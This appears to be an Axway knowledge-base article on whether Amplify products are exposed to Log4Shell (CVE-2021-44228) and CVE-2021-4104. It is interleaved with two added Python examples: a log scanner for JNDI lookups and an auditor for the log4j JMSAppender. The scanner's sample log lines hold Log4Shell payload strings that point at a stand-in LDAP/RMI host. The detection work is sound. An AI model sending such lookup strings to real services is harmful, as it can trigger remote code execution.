KB Article #181955
Impact and resolution of CVE-2021-44228 (Log4Shell) in Amplify
Axway Engineering has confirmed that Amplify SaaS services are NOT vulnerable
Context
A zero-day vulnerability in the popular Java logging library log4j, CVE-2021-44228, was published on GitHub together with a proof of concept (POC) showing that Remote Code Execution (RCE) is possible if log4j logs an attacker-controlled string value.
Axway is aware of log4j CVE-2021-44228 and is evaluating its impact on all Axway products. As conclusions and recommendations become available, we will publish them in the dedicated alert on support.axway.com: https://support.axway.com/news/1331/lang/en
This article provides recommendations and technical clarifications regarding the impact of CVE-2021-44228 on the Amplify platform.
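The trigger described above (log4j evaluating a lookup inside an attacker-controlled string that it logs) is something operators of their own Java services can watch for in request logs. The following is an added example, not Axway code or part of this article: it scans constructed sample access-log lines for the JNDI lookup syntax and reports the line number and client address of each hit. The log lines, addresses and hostnames are all assumed values.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (assumed format; not from any real system).
# Lines 2 and 4 carry a lookup string in the User-Agent and query string respectively.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /api/health HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.79.1"',
    '198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${JNDI:rmi://example.invalid/b} HTTP/1.1" 400 0 "-" "-"',
]

# A log4j 2.x lookup is "${...}"; flag any lookup whose body mentions jndi.
# Case-insensitive because log4j resolves the lookup name case-insensitively.
LOOKUP_RE = re.compile(r"\$\{[^}]*?jndi[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[str]:
    """Return every JNDI lookup string found in one log line."""
    return LOOKUP_RE.findall(line)


def scan_log(lines: List[str]) -> List[Dict]:
    """Scan log lines and return one record per line containing a JNDI lookup."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        lookups = find_jndi_lookups(line)
        if lookups:
            hits.append({
                "line_no": line_no,
                # First whitespace-delimited field of the assumed log format is the client IP.
                "source_ip": line.split(" ", 1)[0],
                "lookups": lookups,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: {hit['source_ip']} sent {hit['lookups']}")
```

The pattern only catches the plain lookup syntax; log4j also resolves nested lookups, so a literal-string match like this is a triage aid rather than a complete detector, and the authoritative fix remains upgrading or reconfiguring the affected log4j instance.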
Details:
Amplify Central / Unified Catalog
Amplify Central and Unified Catalog do not use log4j and are not vulnerable.
Amplify repository
The Amplify repository is not vulnerable, based on feedback from JFrog: https://jfrog.com/knowledge-base/general-jfrog-ser...
Amplify Analytics
A fix is being deployed to production (Europe and US) on December 16th.
AxwayID
Red Hat Single Sign-On 7 is affected by CVE-2021-4104 (statement from Red Hat: https://access.redhat.com/security/cve/CVE-2021-4104); however, AxwayID is not affected because:
- The JMS appender is not configured for use.
- Changing the logging configuration is restricted to AGO.
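The two conditions above are exactly what an operator of a log4j 1.x deployment needs to verify: whether a JMSAppender is declared at all, whether any logger actually writes to it, and who can change that configuration. The following added example (not Axway code, and not AxwayID's real configuration) audits constructed log4j.properties and log4j.xml fragments for a JMSAppender and reports whether it is attached to a logger. The appender names and sample contents are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict

# Fully qualified class name of the log4j 1.x appender named in CVE-2021-4104.
JMS_APPENDER_CLASS = "org.apache.log4j.net.JMSAppender"

# Constructed sample configurations (assumed content, not from any real deployment).
SAFE_PROPERTIES = """
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
"""

RISKY_PROPERTIES = """
log4j.rootLogger=INFO, stdout, jms
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.TopicBindingName=logTopic
"""

RISKY_XML = """<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="console" class="org.apache.log4j.ConsoleAppender"/>
  <appender name="jms" class="org.apache.log4j.net.JMSAppender"/>
  <root><level value="info"/><appender-ref ref="jms"/></root>
</log4j:configuration>
"""


def jms_appenders_in_properties(text: str) -> Dict[str, bool]:
    """Map each declared JMSAppender name to True if a logger references it."""
    declared: Dict[str, bool] = {}
    referenced = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        # "log4j.appender.<name>=<class>" declares an appender; sub-keys carry a further dot.
        match = re.fullmatch(r"log4j\.appender\.([^.]+)", key)
        if match and value == JMS_APPENDER_CLASS:
            declared[match.group(1)] = False
        elif key == "log4j.rootLogger" or key.startswith("log4j.logger."):
            # Logger values are "LEVEL, appender1, appender2, ...".
            parts = [p.strip() for p in value.split(",")]
            referenced.update(parts[1:])
    return {name: name in referenced for name in declared}


def jms_appenders_in_xml(text: str) -> Dict[str, bool]:
    """Same check for the XML configuration format."""
    root = ET.fromstring(text)
    declared = {a.get("name") for a in root.iter("appender") if a.get("class") == JMS_APPENDER_CLASS}
    referenced = {r.get("ref") for r in root.iter("appender-ref")}
    return {name: name in referenced for name in declared}


def assess(report: Dict[str, bool]) -> str:
    """Turn the appender map into a one-line finding."""
    if not report:
        return "no JMSAppender configured: CVE-2021-4104 is not reachable through this configuration"
    if any(report.values()):
        return "JMSAppender in use: restrict who can modify this configuration"
    return "JMSAppender declared but not attached to any logger: remove it to be safe"


if __name__ == "__main__":
    print("safe properties :", assess(jms_appenders_in_properties(SAFE_PROPERTIES)))
    print("risky properties:", assess(jms_appenders_in_properties(RISKY_PROPERTIES)))
    print("risky xml       :", assess(jms_appenders_in_xml(RISKY_XML)))
```

The second condition on the page, restricting who may edit the logging configuration, is not something a parser can prove; the audit only tells you whether a write to the configuration would matter, which is why the "in use" finding points at access control rather than at the appender alone.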
Application Integration
Application Integration is not vulnerable, as documented separately at https://support.axway.com/kb/181965.
Products deployed on customer environment
The products below contain no Java code, so they do not use log4j and are not vulnerable:
Agents
The agents are written in Go.
CLI
The CLI is written in Node.js.